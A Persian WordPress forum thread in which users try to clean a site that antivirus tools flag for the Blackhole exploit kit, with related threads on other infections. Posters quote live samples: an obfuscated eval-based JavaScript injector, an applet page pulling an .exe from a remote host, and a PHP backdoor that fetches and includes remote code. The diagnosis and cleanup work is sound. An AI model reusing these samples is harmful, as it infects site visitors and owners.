• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
Amir.

سایت وردپرسی آلوده به exploit blackhole - exploit kit

23 پست در این موضوع قرار دارد

سلام به عزیزان .

سایت دوستمون به ادرس

varannews.ir

ظاهرا دچار یه جور ویروس شده .

در تصویر پیوست شده اشکالی که آنتی ویروس نورتون بنده ازش میگیره رو قرار دادم

دوستان به سورس سایت یه نگاهی بندازند و بگن مشکل از کدوم کد هستش !

post-87-0-31497000-1356652621_thumb.jpg

1

به اشتراک گذاری این پست


لینک به پست

والا آنتی ویروس من پانداست دقیقا هم عین پانداست هیچی حالیش نیست :D

سرسری نگاه کردم توی سورس قالب یه سری دستورات جاوااسکریپت دیدم خلاصه بگید پاک کنه ببین حل میشه


<script>/*<![CDATA[*/try{window.document.body++}catch(gdsgsdg){dbshre=222;}
if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(0,1,98,96,27,31,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,106,58,114,78,92,94,70,90,103,96,31,31,91,105,95,112,31,34,85,43,84,33,116,7,4,0,1,98,96,109,88,101,94,108,35,32,51,6,3,4,116,24,94,102,110,92,24,116,7,4,0,1,93,105,94,108,101,94,104,111,37,111,107,99,111,92,32,27,54,100,93,106,90,103,96,23,107,107,93,56,30,96,109,110,107,49,39,40,103,96,91,97,90,110,106,99,113,94,40,94,102,101,40,103,114,112,95,39,98,111,100,100,32,26,114,96,92,109,98,56,30,41,41,42,34,23,96,94,99,98,95,108,54,33,44,39,40,32,26,110,107,113,101,95,56,30,111,98,94,111,95,50,42,42,43,103,112,52,98,96,96,95,97,110,53,40,40,41,106,115,50,104,104,109,100,107,97,104,104,53,88,90,108,105,103,108,108,94,53,113,96,107,98,92,100,99,97,109,115,53,95,97,93,94,96,101,51,101,95,97,107,50,38,43,43,39,40,41,106,115,50,108,104,106,53,39,51,32,56,55,38,97,95,108,92,100,93,55,28,36,50,5,2,3,120,4,1,2,96,112,101,91,109,99,106,101,24,98,96,109,88,101,94,108,35,32,115,6,3,4,0,110,90,108,27,93,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,95,40,110,92,108,58,110,111,105,97,91,111,111,92,32,32,109,109,90,31,37,33,99,107,108,105,52,42,38,101,94,94,100,88,108,104,102,116,92,38,92,105,104,38,101,112,115,98,37,96,109,103,103,30,33,52,96,41,106,108,114,102,96,37,100,94,96,111,52,31,38,43,43,39,40,41,106,115,30,51,95,40,110,107,113,101,95,41,109,97,108,99,93,96,100,98,110,116,52,31,97,99,95,91,93,103,33,54,93,38,108,110,116,99,93,39,110,106,103,53,32,42,34,50,94,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,54,33,92,89,107,104,102,112,107,93,32,53,97,37,107,109,115,103,92,38,109,105,107,52,31,41,33,54,93,38,108,95,111,56,108,109,108,100,89,109,109,95,35,30,111,98,94,111,95,31,37,33,44,39,40,32,35,54,93,38,108,95,111,56,108,109,108,100,89,109,109,95,35,30,96,94,99,98,95,108,32,38,34,40,40,41,33,36,50,5,2,3,4,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,110,57,113,77,91,98,69,89,102,95,35,30,90,104,94,116,30,33,84,42,88,37,89,105,106,96,101,92,60,98,100,99,92,33,96,36,50,5,2,3,120);s="";for(i=0;i-630!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}
z=s;e(s);}/*]]>*/</script>

7

به اشتراک گذاری این پست


لینک به پست

البته دوستان وارد ترن ولی نورتون به سایتش که بری تو این قسمت

http://safeweb.norton.com/

میتونی سایتت رو چک کنی -اروریم نمیده (منم نورتن دارم-در کل نورتون و آویرا خیلی گیرن ^_^ )

3

به اشتراک گذاری این پست


لینک به پست

سرسری نگاه کردم توی سورس قالب یه سری دستورات جاوااسکریپت دیدم خلاصه بگید پاک کنه ببین حل میشه

تو سورس قالب رو گشتم چیزی نیافتم با این کدی که شما دادین !

0

به اشتراک گذاری این پست


لینک به پست

من سایت رو باز کردم خطایی نگرفته.

توی گوگل وبمستر چیزی نوشته؟ اخطاری داده؟

2

به اشتراک گذاری این پست


لینک به پست

توی گوگل وبمستر چیزی نوشته؟ اخطاری داده؟

نخیر

0

به اشتراک گذاری این پست


لینک به پست

بعد از 3 ماه هنوز رفع نشده؟!

1

به اشتراک گذاری این پست


لینک به پست

بعد از 3 ماه هنوز رفع نشده؟!

قالب رو عوض کردیم . ظاهرا مشکلی نیست !

اما اخه تو قالب قبلی هم کد خاصی نبود !

0

به اشتراک گذاری این پست


لینک به پست

سلام برادر؛

اگر مشکلی در کنه وب‌سایت وجود داشته باشه، این پلاگین می‌تونه محل بروز مشکلات احتمالی رو شناسایی و اعلام کنه. یک سال پیش؛ مشکلی رو در بطن دیتابیس پیدا کرد که هیچ‌یک از پلاگین‌های معروف نتونسته بودند ردیابی‌اش کنند!

موفق باشی!

ویرایش شده در توسط javadzarei
3

به اشتراک گذاری این پست


لینک به پست

با این سایت هم اسکن کنید


http://sitecheck.sucuri.net/scanner/

3

به اشتراک گذاری این پست


لینک به پست

اسکن کردم این شد نتیجه اش !

http://sitecheck.sucuri.net/results/varannews.ir/

http://www.siteadvisor.com/sites/varannews.ir

.

تو همه جا میگه سالمه به جز اینکه در بلک لیست مک آفی قرار داره !

Domain blacklisted by SiteAdvisor (McAfee): varannews.ir

0

به اشتراک گذاری این پست


لینک به پست

من هم این مشکل رو دارم فقط نمیدونم چرا فقط تو فایرفاکس این اتفاق میفته !!!

1

به اشتراک گذاری این پست


لینک به پست

امروز که نورتون سایتم رو بست یک خطایی داد که وقتی خواستم محتوای سایتم رو ذخیره کنم تو محتوای ذخیره شده یک فایل بود به اسم jovf.html که محتوای داخلش این هست


<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Crvhufzdydidmvp</title>
</head>
<body>
<applet archive="jovf_data/TFnVcMv" code="olhQt">
<param name="hlbWvO" value="http://zikovoko.info/CZ9N4B0MQ2112Asw0LmJ6158Ru0II1Y0kb2M15Z2I0DOyy0axuW0waXW18eER0YYB10lS180ntPM05L9i00kQ20kyyO0k0N50a8JE05XpG0yTLE024Pb00VZS16IU10tsPY07HQb0gERP0uWbM0i4iL0dj9o0uk1q0jClR098GL0UGUp0z3Ez0WybY0MFnd04LvB0cKwN/RhjUGv2P6P.exe?o=1&h=12">
</applet>
</body></html>

آیا این یک نوع ویروسه یا نه

2

به اشتراک گذاری این پست


لینک به پست

درباره این مشکل با بخش پشتیبانی سرور تماس گرفتم اونا گفتن مشکل از قالبتونه قالب رو عوض کردم و قالب قبلی رو حذف کردم یک روز مشکلی نداشتم اما امروز دوباره مشکل اومد این بار وقتی میخواستم وارد صفحه لوگین بشم .

در ضمن یک سایتی هست به آدرس http://urlquery.net درست نمیدونم کار اصلیش چیه اما وقتی سایت رو بررسی میکنه در یک بخشی یکسری آدرس هست که نمیدونم چطوری فعال هستن و همشون یا فیلتر هستن یا توسط آنتی ویروس ها مسدود شدن و البته آدرسها دائما در حال تغییر هستن اگه امکان داره درباره این بخش یک توضیحی بدین

آدرس سایت مربوطه

لینک ها در این بخش هستن

Last 6 reports on ASN: AS24940 Hetzner Online AG

ویرایش شده در توسط 3001.ir
0

به اشتراک گذاری این پست


لینک به پست

روی سرور سایتتون بدافزار افتاده

حالت ویروسی داره

2

به اشتراک گذاری این پست


لینک به پست

چطوری میشه حلش کرد .آنتی ویروس سی پنل چیزی نشون نمیده .

اگه میشه راهنمایی کامل کنین .

1

به اشتراک گذاری این پست


لینک به پست

در ضمن به تازگی آدرس های این چنینی توسط گوگل وب مستر گزارش میشه آیا ربطی به این مسئله داره یا یه مورد دیگس

www.1.com/tag/55-incredible-architecture/index.html

0

به اشتراک گذاری این پست


لینک به پست

بنظر من بهتره بجز پوسته و بخشهایی که اختصاصی هست کلا وردپرس رو حذف کنید. سایتتون رو خالی کنید و بعد بدید مدیر سرور براتون اسکن کنه

2

به اشتراک گذاری این پست


لینک به پست

قبلا با مدیر سرور تماس گرفتم و اونا گفتن مشکل از قالبتونه و از انجمن های وردپرس مشکلتون رو حل کنین .

حالا اگه کلیه فایل های روی سرور رو پاک کنم مشکل خاصی پیش میاد یا نه

0

به اشتراک گذاری این پست


لینک به پست

اگر مشکل از وردپرس باشه با حذف و نصب دستی وردپرس و همچنین اسکن کدهای پوسته تون مشکل باید حل بشه.

اگر با اینکار بصورت مقطعی درست بشه و باز دوباره همین مشکل ایجاد بشه در سرورتون بدافزار افتاده

1

به اشتراک گذاری این پست


لینک به پست

دیروز صبح تمامی اطلاعات روی سرور رو پاک کردم ودوباره بروش دستی وردپرس رو نصب کردم و تا حالا مشکلی بوجود نیومده .

0

به اشتراک گذاری این پست


لینک به پست

پس کمی صبر کنید ببینید در ادامه چی میشه

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط sajadshiraz
      با سلام
      چند روز میشه وردپرس من مشکل بهم زده
      روز اول متوجه شدم سایت فقط صفحه اول باز میشه بقیه صفحات ارور 404 میده
      پرسیدم گفتن پیوند یکتا تغییر کرده درستش کردم ولی بازم تغییر کرد
      تو هاست چک کردم دیدم فایل htaccess مشکل داره و مشکلش اینه که بعد از چند ساعت از پاک کردنش دوباره permission از حالت 644 به 444 تغییر پیدا میکنه و حجمش تند تند اضافه میشه و بعد از اینکه حجم زیاد شد دیگه ارور 404 شروع میشه
      با هاست در میان گذاشتم چندین بار ویروس یابی کردن میگن مشکلی نیست
      قالب ها رو کلا حذف کردم
      افزونه ها رو کلا حذف کردم
      بازم این مشکل وجود داره
      خواهشا راهنمایی کنید
    • توسط SOHEILAS
      سلام
       
      سایت من توی گوگل ویروسی نشون میده واسه همین سایت رو گوگل گذاشته توی لیست سیاه
      در صورتی که توی سایت هیچی نیست
      لطفا کمکم کنید مشکل رو حل کنم
      به این لینک ها گیر داده انگار
       
      http://www.meli-media.com/11648/دانلود-فول-البوم-جعفر/
      http://www.meli-media.com/11648/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D9%81%D9%88%D9%84-%D8%A7%D9%84%D8%A8%D9%88%D9%85-%D8%AC%D8%B9%D9%81%D8%B1/
      ادرس سایت هم meli-media.com
      اینم چیزای که تو گوگل وبمستر گفته شده
      کلا 4 تا جاوا دارم که چک کردم هیچی کد مخربی توش نیست
      Recommended actions 1. Check out your source code (including JavaScript files) for any unauthorized changes.
      2. Check out our Help Guide for Hacked Sites if you believe that your site has been hacked.
      3. Review our resources about Website Security.
      4. If you are unsure of how to proceed, ask questions in the Webmaster Help Forum, or consider enlisting assistance from a trusted security expert.  
      https://www.google.com/transparencyreport/safebrowsing/diagnostic/?hl=fa#url=meli-media.com 
       
      اسکن میکنم میگه خطرناکه
       
      لطفا اگه کسی میتونه کمک کنه دریغ نکنه
       


    • توسط دکتر مهندس
      سلام دوستان
      توی هاست من توی دوتا از پوشه ها بصورت عجیبی یهویی داره تعداد زیادی فایلهای نامفهوم رشد میکنه. فعلا دسترسی اون دوتا پوشه رو روی 000 قرار دادم و مشکل تکثیر فایلها حذف شد. اما هنوز نتونستم دلیلش رو پیدا کنم. با ویروس اسکنر خود سی پنل هم اسکن کردم اما چیزی پیدا نکرد.
      ضمنا این مسأله باعث شده دسترسی به مدیریت وردپرس هم نداشته باشم و خود سایت هم که در آدرس http://jadnews.ir مشخص هست که چه بلایی سرش اومده.
      چطور میشه پیدا کنم که فایل ویروس کجاست؟
    • توسط سعید شعبانی
      دوستان سلام
      کامپیوتر من قبلا ویروسی شده بود ولی مشکلی نداشت تا اینکه دیروز باز چندتا ویروس جدید از طریق فلش وارد کامپیوترم شدند و همچی رو زدند داغون کردند. ویندوز(8) بالا می یومد ولی اصلا هیچی پیدا نبود (فقط یه صفحه سیاه میومد) که با task manager می شد computer را باز کرد و باهاش کار کرد ولی من دیگه ویندوز رو عوض کردم و آنتی ویروس node 32 را نصب و آپدیت کردم. حالا که خواستم وارد داشبورد سایت وردپرسیم بشم نود 32 گفت که داخل آدرس dnoj.ir/wp-admin یک تروجان هست. آیا واقعا سایتم ویروسی شده؟ باید چیکارش کنم؟ (با آنتی ویروس cpanel هم وقتی چکش می کنم هیچ ویروسی پیدا نمی کنه)
      تصویری از قرنطینه نود32 (به اولین مورد توجه کنید)